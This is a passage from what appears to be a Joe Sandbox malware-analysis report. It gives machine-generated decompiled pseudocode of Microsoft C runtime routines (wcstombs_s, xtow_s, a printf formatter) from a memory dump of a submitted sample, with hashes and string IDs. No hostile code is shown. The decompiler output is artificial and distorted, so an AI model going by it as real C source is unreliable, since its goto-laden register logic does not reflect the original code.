                            								_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
                            								_push(2);
                            								_t91 = L0040E1A0();
                            								_t147 = _t147 + 0x14;
                            								__eflags = _t91 - 1;
                            								if(_t91 == 1) {
                            									asm("int3");
                            								}
                            							}
                            							__eflags =  *(_t144 - 0x18);
                            							if( *(_t144 - 0x18) != 0) {
                            								goto L54;
                            							} else {
                            								 *((intOrPtr*)(L0040EC70(_t119))) = 0x22;
                            								E00411A50(_t111, _t119, _t142, _t143, L"sizeInBytes > retsize", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x157, 0);
                            								_t86 = 0x22;
                            								goto L59;
                            							}
                            						} else {
                            							__eflags =  *(_t144 + 0xc);
                            							if( *(_t144 + 0xc) != 0) {
                            								 *( *(_t144 + 0xc)) = 0;
                            								__eflags =  *(_t144 + 0x10) - 0xffffffff;
                            								if( *(_t144 + 0x10) != 0xffffffff) {
                            									__eflags =  *(_t144 + 0x10) - 0x7fffffff;
                            									if( *(_t144 + 0x10) != 0x7fffffff) {
                            										__eflags =  *(_t144 + 0x10) - 1;
                            										if( *(_t144 + 0x10) > 1) {
                            											__eflags =  *0x60a658 -  *(_t144 + 0x10) - 1; // 0xffffffff
                            											if(__eflags >= 0) {
                            												_t140 =  *(_t144 + 0x10) - 1;
                            												__eflags = _t140;
                            												 *(_t144 - 0x28) = _t140;
                            											} else {
                            												_t123 =  *0x60a658; // 0xffffffff
                            												 *(_t144 - 0x28) = _t123;
                            											}
                            											_t115 =  *(_t144 + 0xc) + 1;
                            											__eflags =  *(_t144 + 0xc) + 1;
                            											E00412D20(_t142,  *(_t144 + 0xc) + 1, 0xfe,  *(_t144 - 0x28));
                            										}
                            									}
                            								}
                            							}
                            							_t86 =  *((intOrPtr*)(L0040EC70(_t115)));
                            							goto L59;
                            						}
                            					} else {
                            						 *((intOrPtr*)(L0040EC70(0x7fffffff))) = 0x16;
                            						E00411A50(_t111, 0x7fffffff, _t142, _t143, L"bufferSize <= INT_MAX", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x13f, 0);
                            						_t86 = 0x16;
                            						goto L59;
                            					}
                            				} else {
                            					 *((intOrPtr*)(L0040EC70(_t112))) = 0x16;
                            					E00411A50(_t111, _t112, _t142, _t143, L"(dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x133, 0);
                            					_t86 = 0x16;
                            					L59:
                            					return _t86;
                            				}
                            			}
























                            0x0041dfc5
                            0x0041dfc5
                            0x0041dfc5
                            0x0041dfc5
                            0x0041dfc9
                            0x0041dfe0
                            0x0041dfd7
                            0x0041dfd7
                            0x0041dfd7
                            0x0041dfea
                            0x0041dff1
                            0x0041dff3
                            0x0041dff8
                            0x0041dffa
                            0x0041dfff
                            0x0041e004
                            0x0041e006
                            0x0041e00b
                            0x0041e011
                            0x0041e013
                            0x0041e013
                            0x0041e011
                            0x0041e018
                            0x0041e04d
                            0x0041e051
                            0x0041e053
                            0x0041e056
                            0x0041e059
                            0x0041e05d
                            0x0041e05f
                            0x0041e066
                            0x0041e068
                            0x0041e06c
                            0x0041e074
                            0x0041e07a
                            0x0041e08a
                            0x0041e08a
                            0x0041e08d
                            0x0041e07c
                            0x0041e07c
                            0x0041e082
                            0x0041e082
                            0x0041e09c
                            0x0041e0a0
                            0x0041e0a5
                            0x0041e0a5
                            0x0041e06c
                            0x0041e066
                            0x0041e05d
                            0x0041e0a8
                            0x0041e0ac
                            0x0041e0ae
                            0x0041e0b1
                            0x0041e0b1
                            0x0041e0ba
                            0x0041e0bd
                            0x0041e0c7
                            0x0041e0ca
                            0x0041e0bf
                            0x0041e0c2
                            0x0041e0c2
                            0x0041e0d0
                            0x0041e0d8
                            0x0041e0db
                            0x0041e0dd
                            0x0041e0dd
                            0x0041e0e0
                            0x0041e0e3
                            0x0041e0e5
                            0x0041e0ea
                            0x0041e0ec
                            0x0041e0f1
                            0x0041e0f6
                            0x0041e0f8
                            0x0041e0fd
                            0x0041e100
                            0x0041e103
                            0x0041e105
                            0x0041e105
                            0x0041e103
                            0x0041e106
                            0x0041e10a
                            0x0041e14b
                            0x0041e14f
                            0x0041e154
                            0x0041e157
                            0x0041e15a
                            0x0041e15e
                            0x0041e1ca
                            0x0041e1cd
                            0x0041e1d0
                            0x0041e1d4
                            0x0041e2c1
                            0x0041e2c1
                            0x0041e2c5
                            0x0041e2cd
                            0x0041e2cd
                            0x0041e2cf
                            0x00000000
                            0x0041e2cf
                            0x0041e1dd
                            0x0041e1e0
                            0x0041e2b7
                            0x0041e2ba
                            0x0041e2ba
                            0x0041e2bd
                            0x00000000
                            0x0041e2bd
                            0x0041e1e6
                            0x0041e1ea
                            0x0041e2aa
                            0x0041e2ad
                            0x0041e2b0
                            0x00000000
                            0x0041e2b0
                            0x0041e1f3
                            0x0041e1f6
                            0x0041e1fa
                            0x0041e1fc
                            0x0041e203
                            0x0041e205
                            0x0041e209
                            0x0041e211
                            0x0041e217
                            0x0041e226
                            0x0041e226
                            0x0041e229
                            0x0041e219
                            0x0041e219
                            0x0041e21e
                            0x0041e21e
                            0x0041e22c
                            0x0041e238
                            0x0041e23c
                            0x0041e241
                            0x0041e241
                            0x0041e209
                            0x0041e203
                            0x0041e244
                            0x0041e247
                            0x0041e24a
                            0x0041e24e
                            0x0041e251
                            0x0041e253
                            0x0041e258
                            0x0041e25a
                            0x0041e25f
                            0x0041e264
                            0x0041e266
                            0x0041e26b
                            0x0041e26e
                            0x0041e271
                            0x0041e273
                            0x0041e273
                            0x0041e271
                            0x0041e274
                            0x0041e278
                            0x00000000
                            0x0041e27a
                            0x0041e27f
                            0x0041e29b
                            0x0041e2a3
                            0x00000000
                            0x0041e2a3
                            0x0041e160
                            0x0041e160
                            0x0041e164
                            0x0041e169
                            0x0041e16c
                            0x0041e170
                            0x0041e172
                            0x0041e179
                            0x0041e17b
                            0x0041e17f
                            0x0041e187
                            0x0041e18d
                            0x0041e19d
                            0x0041e19d
                            0x0041e1a0
                            0x0041e18f
                            0x0041e18f
                            0x0041e195
                            0x0041e195
                            0x0041e1af
                            0x0041e1af
                            0x0041e1b3
                            0x0041e1b8
                            0x0041e17f
                            0x0041e179
                            0x0041e170
                            0x0041e1c0
                            0x00000000
                            0x0041e1c0
                            0x0041e10c
                            0x0041e111
                            0x0041e12d
                            0x0041e135
                            0x00000000
                            0x0041e135
                            0x0041e01a
                            0x0041e01f
                            0x0041e03b
                            0x0041e043
                            0x0041e2d2
                            0x0041e2d5
                            0x0041e2d5

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041E03B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __invalid_parameter
                            • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$u!h0{@
                            • API String ID: 3730194576-74403819
                            • Opcode ID: ce8ae9df8e789ac059ff74659df8e88a9c9f39a50a28f67c8ebcc4944a694a40
                            • Instruction ID: b93a81b1d666650da6f2c1088c5680eb8d10ddecfd6b127fdbc5ede70344e445
                            • Opcode Fuzzy Hash: ce8ae9df8e789ac059ff74659df8e88a9c9f39a50a28f67c8ebcc4944a694a40
                            • Instruction Fuzzy Hash: 49016D70E843189AEB209E81CC06BEF7260AB1471DF11042BE912392C1C3FD57D1CB9E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 35%
                            			E0041EF81() {
                            				intOrPtr _t79;
                            				void* _t84;
                            				void* _t90;
                            				void* _t123;
                            				void* _t124;
                            				void* _t125;
                            				void* _t127;
                            
                            				 *((intOrPtr*)(_t125 - 8)) = 0;
                            				 *((intOrPtr*)(_t125 - 4)) =  *((intOrPtr*)(_t125 + 0xc));
                            				if( *((intOrPtr*)(_t125 + 0x18)) != 0) {
                            					 *((short*)( *((intOrPtr*)(_t125 - 4)))) = 0x2d;
                            					 *((intOrPtr*)(_t125 - 4)) =  *((intOrPtr*)(_t125 - 4)) + 2;
                            					 *((intOrPtr*)(_t125 - 8)) =  *((intOrPtr*)(_t125 - 8)) + 1;
                            					 *(_t125 + 8) =  ~( *(_t125 + 8));
                            				}
                            				 *((intOrPtr*)(_t125 - 0x14)) =  *((intOrPtr*)(_t125 - 4));
                            				do {
                            					 *(_t125 - 0xc) =  *(_t125 + 8) %  *(_t125 + 0x14);
                            					 *(_t125 + 8) =  *(_t125 + 8) /  *(_t125 + 0x14);
                            					if( *(_t125 - 0xc) <= 9) {
                            						 *((short*)( *((intOrPtr*)(_t125 - 4)))) =  *(_t125 - 0xc) + 0x30;
                            						 *((intOrPtr*)(_t125 - 4)) =  *((intOrPtr*)(_t125 - 4)) + 2;
                            					} else {
                            						 *((short*)( *((intOrPtr*)(_t125 - 4)))) =  *(_t125 - 0xc) + 0x57;
                            						 *((intOrPtr*)(_t125 - 4)) =  *((intOrPtr*)(_t125 - 4)) + 2;
                            					}
                            					 *((intOrPtr*)(_t125 - 8)) =  *((intOrPtr*)(_t125 - 8)) + 1;
                            				} while ( *(_t125 + 8) > 0 &&  *((intOrPtr*)(_t125 - 8)) <  *((intOrPtr*)(_t125 + 0x10)));
                            				if( *((intOrPtr*)(_t125 - 8)) <  *((intOrPtr*)(_t125 + 0x10))) {
                            					L14:
                            					 *((short*)( *((intOrPtr*)(_t125 - 4)))) = 0;
                            					 *((intOrPtr*)(_t125 - 4)) =  *((intOrPtr*)(_t125 - 4)) - 2;
                            					do {
                            						 *((short*)(_t125 - 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t125 - 4))));
                            						 *((short*)( *((intOrPtr*)(_t125 - 4)))) =  *((intOrPtr*)( *((intOrPtr*)(_t125 - 0x14))));
                            						 *((short*)( *((intOrPtr*)(_t125 - 0x14)))) =  *((intOrPtr*)(_t125 - 0x10));
                            						 *((intOrPtr*)(_t125 - 4)) =  *((intOrPtr*)(_t125 - 4)) - 2;
                            						 *((intOrPtr*)(_t125 - 0x14)) =  *((intOrPtr*)(_t125 - 0x14)) + 2;
                            					} while ( *((intOrPtr*)(_t125 - 0x14)) <  *((intOrPtr*)(_t125 - 4)));
                            					_t79 = 0;
                            					L17:
                            					return _t79;
                            				}
                            				_t98 =  *((intOrPtr*)(_t125 + 0xc));
                            				 *((short*)( *((intOrPtr*)(_t125 + 0xc)))) = 0;
                            				asm("sbb eax, eax");
                            				 *(_t125 - 0x28) =  ~0x00000000;
                            				if( *((intOrPtr*)(_t125 - 8)) ==  *((intOrPtr*)(_t125 + 0x10))) {
                            					_push(L"length < sizeInTChars");
                            					_push(0);
                            					_push(0x8e);
                            					_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\xtoa.c");
                            					_push(2);
                            					_t84 = L0040E1A0();
                            					_t127 = _t127 + 0x14;
                            					if(_t84 == 1) {
                            						asm("int3");
                            					}
                            				}
                            				if( *(_t125 - 0x28) != 0) {
                            					goto L14;
                            				} else {
                            					 *((intOrPtr*)(L0040EC70(_t98))) = 0x22;
                            					E00411A50(_t90, _t98, _t123, _t124, L"length < sizeInTChars", L"xtow_s", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\xtoa.c", 0x8e, 0);
                            					_t79 = 0x22;
                            					goto L17;
                            				}
                            			}










                            0x0041ef81
                            0x0041ef8b
                            0x0041ef92
                            0x0041ef9c
                            0x0041efa5
                            0x0041efae
                            0x0041efb6
                            0x0041efb6
                            0x0041efbc
                            0x0041efbf
                            0x0041efc7
                            0x0041efd2
                            0x0041efd9
                            0x0041effb
                            0x0041f004
                            0x0041efdb
                            0x0041efe4
                            0x0041efed
                            0x0041efed
                            0x0041f00d
                            0x0041f010
                            0x0041f024
                            0x0041f094
                            0x0041f099
                            0x0041f0a2
                            0x0041f0a5
                            0x0041f0ab
                            0x0041f0b8
                            0x0041f0c2
                            0x0041f0cb
                            0x0041f0d4
                            0x0041f0da
                            0x0041f0df
                            0x0041f0e1
                            0x0041f0e4
                            0x0041f0e4
                            0x0041f028
                            0x0041f02b
                            0x0041f034
                            0x0041f038
                            0x0041f03b
                            0x0041f03d
                            0x0041f042
                            0x0041f044
                            0x0041f049
                            0x0041f04e
                            0x0041f050
                            0x0041f055
                            0x0041f05b
                            0x0041f05d
                            0x0041f05d
                            0x0041f05b
                            0x0041f062
                            0x00000000
                            0x0041f064
                            0x0041f069
                            0x0041f085
                            0x0041f08d
                            0x00000000
                            0x0041f08d

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041F085
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __invalid_parameter
                            • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c$length < sizeInTChars$xtow_s
                            • API String ID: 3730194576-3173509935
                            • Opcode ID: fef4c4c0535a45d997bbdb4fedfaebb38fee43c7b07f768c1c0c46d55aef9b02
                            • Instruction ID: d4c17832ba0799eff67dd975395ad2caecdaa508a036acbd39251cd37de16b9a
                            • Opcode Fuzzy Hash: fef4c4c0535a45d997bbdb4fedfaebb38fee43c7b07f768c1c0c46d55aef9b02
                            • Instruction Fuzzy Hash: FF410E74E00209EFCB04DF94C541B9EBBB2FF58304F2081AAE804AB395D775AE91DB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E004238B6(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                            				signed int _t483;
                            				void* _t488;
                            				signed int _t490;
                            				void* _t498;
                            				intOrPtr _t501;
                            				signed int _t519;
                            				intOrPtr _t523;
                            				intOrPtr _t524;
                            				signed int _t525;
                            				void* _t527;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t524 = __esi;
                            					_t523 = __edi;
                            					_t501 = __ebx;
                            					 *(_t525 - 0x30) = 8;
                            					while(1) {
                            						L143:
                            						 *(__ebp - 0x460) = 7;
                            						while(1) {
                            							L145:
                            							 *(__ebp - 8) = 0x10;
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            							__eflags =  *(__ebp - 0x10) & 0x00000080;
                            							if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            								__edx = 0x30;
                            								 *(__ebp - 0x14) = __dx;
                            								 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
                            								__eflags =  *(__ebp - 0x460) + 0x51;
                            								 *(__ebp - 0x12) = __ax;
                            								 *(__ebp - 0x1c) = 2;
                            							}
                            							while(1) {
                            								L150:
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            								__eflags =  *(__ebp - 0x10) & 0x00008000;
                            								if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            									__eflags =  *(__ebp - 0x10) & 0x00001000;
                            									if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            										__eflags =  *(__ebp - 0x10) & 0x00000020;
                            										if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            											__eflags =  *(__ebp - 0x10) & 0x00000040;
                            											if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            												__ecx = __ebp + 0x14;
                            												__eax = E0041C290(__ebp + 0x14);
                            												__edx = 0;
                            												__eflags = 0;
                            												 *(__ebp - 0x4a0) = __eax;
                            												 *(__ebp - 0x49c) = 0;
                            											} else {
                            												__eax = __ebp + 0x14;
                            												__eax = E0041C290(__ebp + 0x14);
                            												asm("cdq");
                            												 *(__ebp - 0x4a0) = __eax;
                            												 *(__ebp - 0x49c) = __edx;
                            											}
                            										} else {
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            											__eflags =  *(__ebp - 0x10) & 0x00000040;
                            											if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            												__ecx = __ebp + 0x14;
                            												E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            												asm("cdq");
                            												 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
                            												 *(__ebp - 0x49c) = __edx;
                            											} else {
                            												__eax = __ebp + 0x14;
                            												__eax = E0041C290(__ebp + 0x14);
                            												__ax = __eax;
                            												asm("cdq");
                            												 *(__ebp - 0x4a0) = __eax;
                            												 *(__ebp - 0x49c) = __edx;
                            											}
                            										}
                            									} else {
                            										__eax = __ebp + 0x14;
                            										 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            										 *(__ebp - 0x49c) = __edx;
                            									}
                            								} else {
                            									__ecx = __ebp + 0x14;
                            									 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            									 *(__ebp - 0x49c) = __edx;
                            								}
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            								__eflags =  *(__ebp - 0x10) & 0x00000040;
                            								if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            									goto L167;
                            								}
                            								L163:
                            								__eflags =  *(__ebp - 0x49c);
                            								if(__eflags > 0) {
                            									goto L167;
                            								}
                            								L164:
                            								if(__eflags < 0) {
                            									L166:
                            									 *(__ebp - 0x4a0) =  ~( *(__ebp - 0x4a0));
                            									__edx =  *(__ebp - 0x49c);
                            									asm("adc edx, 0x0");
                            									__edx =  ~( *(__ebp - 0x49c));
                            									 *(__ebp - 0x4a8) =  ~( *(__ebp - 0x4a0));
                            									 *(__ebp - 0x4a4) =  ~( *(__ebp - 0x49c));
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            									L168:
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            									__eflags =  *(__ebp - 0x10) & 0x00008000;
                            									if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            										__eflags =  *(__ebp - 0x10) & 0x00001000;
                            										if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            											__edx =  *(__ebp - 0x4a8);
                            											__eax =  *(__ebp - 0x4a4);
                            											__eax =  *(__ebp - 0x4a4) & 0x00000000;
                            											__eflags = __eax;
                            											 *(__ebp - 0x4a4) = __eax;
                            										}
                            									}
                            									__eflags =  *(__ebp - 0x30);
                            									if( *(__ebp - 0x30) >= 0) {
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            										__eflags =  *(__ebp - 0x30) - 0x200;
                            										if( *(__ebp - 0x30) > 0x200) {
                            											 *(__ebp - 0x30) = 0x200;
                            										}
                            									} else {
                            										 *(__ebp - 0x30) = 1;
                            									}
                            									 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
                            									__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
                            									if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
                            										 *(__ebp - 0x1c) = 0;
                            									}
                            									__eax = __ebp - 0x249;
                            									 *(__ebp - 4) = __ebp - 0x249;
                            									while(1) {
                            										L178:
                            										__ecx =  *(__ebp - 0x30);
                            										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            										__eflags =  *(__ebp - 0x30);
                            										if( *(__ebp - 0x30) > 0) {
                            											goto L180;
                            										}
                            										L179:
                            										 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
                            										__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
                            										if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
                            											L183:
                            											__ebp - 0x249 = __ebp - 0x249 -  *(__ebp - 4);
                            											 *(__ebp - 0x24) = __ebp - 0x249 -  *(__ebp - 4);
                            											__ecx =  *(__ebp - 4);
                            											__ecx =  *(__ebp - 4) + 1;
                            											 *(__ebp - 4) = __ecx;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
                            											__eflags =  *(__ebp - 0x10) & 0x00000200;
                            											if(( *(__ebp - 0x10) & 0x00000200) == 0) {
                            												while(1) {
                            													L187:
                            													__eflags =  *(__ebp - 0x28);
                            													if( *(__ebp - 0x28) != 0) {
                            														goto L212;
                            													}
                            													L188:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            													__eflags =  *(__ebp - 0x10) & 0x00000040;
                            													if(( *(__ebp - 0x10) & 0x00000040) != 0) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000100;
                            														__eflags =  *(__ebp - 0x10) & 0x00000100;
                            														if(( *(__ebp - 0x10) & 0x00000100) == 0) {
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000001;
                            															__eflags =  *(__ebp - 0x10) & 0x00000001;
                            															if(( *(__ebp - 0x10) & 0x00000001) == 0) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000002;
                            																__eflags =  *(__ebp - 0x10) & 0x00000002;
                            																if(( *(__ebp - 0x10) & 0x00000002) != 0) {
                            																	__edx = 0x20;
                            																	 *(__ebp - 0x14) = __dx;
                            																	 *(__ebp - 0x1c) = 1;
                            																}
                            															} else {
                            																__eax = 0x2b;
                            																 *(__ebp - 0x14) = __ax;
                            																 *(__ebp - 0x1c) = 1;
                            															}
                            														} else {
                            															__ecx = 0x2d;
                            															 *(__ebp - 0x14) = __cx;
                            															 *(__ebp - 0x1c) = 1;
                            														}
                            													}
                            													 *(__ebp - 0x18) =  *(__ebp - 0x18) -  *(__ebp - 0x24);
                            													__eax =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
                            													 *(__ebp - 0x4ac) =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x0000000c;
                            													__eflags =  *(__ebp - 0x10) & 0x0000000c;
                            													if(( *(__ebp - 0x10) & 0x0000000c) == 0) {
                            														__edx = __ebp - 0x44c;
                            														__eax =  *(__ebp + 8);
                            														__ecx =  *(__ebp - 0x4ac);
                            														__eax = E00423FF0(0x20,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
                            													}
                            													__edx = __ebp - 0x44c;
                            													__eax =  *(__ebp + 8);
                            													__ecx =  *(__ebp - 0x1c);
                            													__edx = __ebp - 0x14;
                            													E00424030( *(__ebp - 0x1c), __ebp - 0x14,  *(__ebp - 0x1c),  *(__ebp + 8), __ebp - 0x44c) =  *(__ebp - 0x10);
                            													__eax =  *(__ebp - 0x10) & 0x00000008;
                            													__eflags =  *(__ebp - 0x10) & 0x00000008;
                            													if(( *(__ebp - 0x10) & 0x00000008) != 0) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
                            														__eflags =  *(__ebp - 0x10) & 0x00000004;
                            														if(( *(__ebp - 0x10) & 0x00000004) == 0) {
                            															__edx = __ebp - 0x44c;
                            															__eax =  *(__ebp + 8);
                            															__ecx =  *(__ebp - 0x4ac);
                            															__eax = E00423FF0(0x30,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
                            														}
                            													}
                            													__eflags =  *(__ebp - 0xc);
                            													if( *(__ebp - 0xc) != 0) {
                            														L208:
                            														__edx = __ebp - 0x44c;
                            														__eax =  *(__ebp + 8);
                            														__ecx =  *(__ebp - 0x24);
                            														__edx =  *(__ebp - 4);
                            														__eax = E00424030(__ecx,  *(__ebp - 4), __ecx,  *(__ebp + 8), __ebp - 0x44c);
                            														goto L209;
                            													} else {
                            														L201:
                            														__eflags =  *(__ebp - 0x24);
                            														if( *(__ebp - 0x24) <= 0) {
                            															goto L208;
                            														}
                            														L202:
                            														__edx =  *(__ebp - 4);
                            														 *(__ebp - 0x4b0) =  *(__ebp - 4);
                            														__eax =  *(__ebp - 0x24);
                            														 *(__ebp - 0x4b4) =  *(__ebp - 0x24);
                            														while(1) {
                            															L203:
                            															__ecx =  *(__ebp - 0x4b4);
                            															 *(__ebp - 0x4b4) =  *(__ebp - 0x4b4) - 1;
                            															 *(__ebp - 0x4b4) =  *(__ebp - 0x4b4) - 1;
                            															__eflags = __ecx;
                            															if(__ecx <= 0) {
                            																break;
                            															}
                            															L204:
                            															__ecx = __ebp - 0x40;
                            															__eax = E0040D3B0(__ebp - 0x40);
                            															__ecx = __ebp - 0x40;
                            															E0040D3B0(__ebp - 0x40) =  *__eax;
                            															__ecx =  *(__ebp - 0x458 + 0xac);
                            															__edx =  *(__ebp - 0x4b0);
                            															__eax = __ebp - 0x458;
                            															 *(__ebp - 0x4b8) = E00419150(__ebp - 0x458,  *(__ebp - 0x4b0),  *(__ebp - 0x458 + 0xac), __ebp - 0x458);
                            															__eflags =  *(__ebp - 0x4b8);
                            															if( *(__ebp - 0x4b8) > 0) {
                            																L206:
                            																__ecx = __ebp - 0x44c;
                            																__edx =  *(__ebp + 8);
                            																 *(__ebp - 0x458) & 0x0000ffff = E00423F90( *(__ebp - 0x458) & 0x0000ffff,  *(__ebp + 8), __ebp - 0x44c);
                            																 *(__ebp - 0x4b0) =  *(__ebp - 0x4b0) +  *(__ebp - 0x4b8);
                            																 *(__ebp - 0x4b0) =  *(__ebp - 0x4b0) +  *(__ebp - 0x4b8);
                            																continue;
                            															}
                            															L205:
                            															 *(__ebp - 0x44c) = 0xffffffff;
                            															break;
                            														}
                            														L207:
                            														L209:
                            														__eflags =  *(__ebp - 0x44c);
                            														if( *(__ebp - 0x44c) >= 0) {
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
                            															__eflags =  *(__ebp - 0x10) & 0x00000004;
                            															if(( *(__ebp - 0x10) & 0x00000004) != 0) {
                            																__ecx = __ebp - 0x44c;
                            																__edx =  *(__ebp + 8);
                            																 *(__ebp - 0x4ac) = E00423FF0(0x20,  *(__ebp - 0x4ac),  *(__ebp + 8), __ebp - 0x44c);
                            															}
                            														}
                            													}
                            													L212:
                            													__eflags =  *(__ebp - 0x20);
                            													if( *(__ebp - 0x20) != 0) {
                            														__ecx =  *(__ebp - 0x20);
                            														__eax = L0040C240( *(__ebp - 0x20), 2);
                            														 *(__ebp - 0x20) = 0;
                            													}
                            													while(1) {
                            														L214:
                            														 *(_t525 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t525 + 0xc))));
                            														_t502 =  *(_t525 - 0x454) & 0x0000ffff;
                            														 *((intOrPtr*)(_t525 + 0xc)) =  *((intOrPtr*)(_t525 + 0xc)) + 2;
                            														if(( *(_t525 - 0x454) & 0x0000ffff) == 0 ||  *(_t525 - 0x44c) < 0) {
                            															break;
                            														} else {
                            															if(( *(_t525 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t525 - 0x454) & 0x0000ffff) > 0x78) {
                            																 *(_t525 - 0x4d8) = 0;
                            															} else {
                            																 *(_t525 - 0x4d8) =  *(( *(_t525 - 0x454) & 0x0000ffff) + L"pecifier\", 0)") & 0xf;
                            															}
                            														}
                            														L7:
                            														 *(_t525 - 0x450) =  *(_t525 - 0x4d8);
                            														_t519 =  *(_t525 - 0x450) * 9;
                            														_t490 =  *(_t525 - 0x45c);
                            														_t510 = ( *(_t519 + _t490 + 0x4083d0) & 0x000000ff) >> 4;
                            														 *(_t525 - 0x45c) = ( *(_t519 + _t490 + 0x4083d0) & 0x000000ff) >> 4;
                            														if( *(_t525 - 0x45c) != 8) {
                            															L16:
                            															 *(_t525 - 0x4e0) =  *(_t525 - 0x45c);
                            															__eflags =  *(_t525 - 0x4e0) - 7;
                            															if( *(_t525 - 0x4e0) > 7) {
                            																continue;
                            															}
                            															L17:
